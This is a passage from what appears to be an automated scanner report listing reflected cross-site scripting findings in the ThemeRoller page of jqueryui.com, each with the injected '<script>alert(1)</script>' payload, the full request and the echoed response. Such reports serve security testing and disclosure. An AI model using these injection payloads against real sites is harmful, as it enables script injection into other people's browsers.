0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=3636367f82b"><script>alert(1)</script>9800a832c8e&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTe
...[SNIP]...

3.173. http://jqueryui.com/themeroller/ [fcContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c309"><script>alert(1)</script>9ef676458d7 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=2222227c309"><script>alert(1)</script>9ef676458d7&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=2222227c309"><script>alert(1)</script>9ef676458d7&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTexture
...[SNIP]...

3.174. http://jqueryui.com/themeroller/ [fcDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff5c6"><script>alert(1)</script>4bb9610b710 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000ff5c6"><script>alert(1)</script>4bb9610b710&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Content=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000ff5c6"><script>alert(1)</script>4bb9610b710&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_i
...[SNIP]...

3.175. http://jqueryui.com/themeroller/ [fcError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caf44"><script>alert(1)</script>c36131bd0f6 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0acaf44"><script>alert(1)</script>c36131bd0f6&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0acaf44"><script>alert(1)</script>c36131bd0f6&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

3.176. http://jqueryui.com/themeroller/ [fcHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a923"><script>alert(1)</script>0d310ed75a9 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff7a923"><script>alert(1)</script>0d310ed75a9&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff7a923"><script>alert(1)</script>0d310ed75a9&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextu
...[SNIP]...

3.177. http://jqueryui.com/themeroller/ [fcHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5b78"><script>alert(1)</script>878fe90d931 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636f5b78"><script>alert(1)</script>878fe90d931&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636f5b78"><script>alert(1)</script>878fe90d931&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

3.178. http://jqueryui.com/themeroller/ [fcHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1722"><script>alert(1)</script>3fa67dfb137 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74c1722"><script>alert(1)</script>3fa67dfb137&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74c1722"><script>alert(1)</script>3fa67dfb137&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHig
...[SNIP]...

3.179. http://jqueryui.com/themeroller/ [ffDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40feb"><script>alert(1)</script>2127341874 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif40feb"><script>alert(1)</script>2127341874&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120127

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=arial,%20helvetica,%20sans-serif40feb"><script>alert(1)</script>2127341874&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorC
...[SNIP]...

3.180. http://jqueryui.com/themeroller/ [fsDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd562"><script>alert(1)</script>d38fcc48096 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12pxcd562"><script>alert(1)</script>d38fcc48096&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12pxcd562"><script>alert(1)</script>d38fcc48096&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent
...[SNIP]...

3.181. http://jqueryui.com/themeroller/ [fwDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36130"><script>alert(1)</script>7eb2177a8ce was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold36130"><script>alert(1)</script>7eb2177a8ce&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120065

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
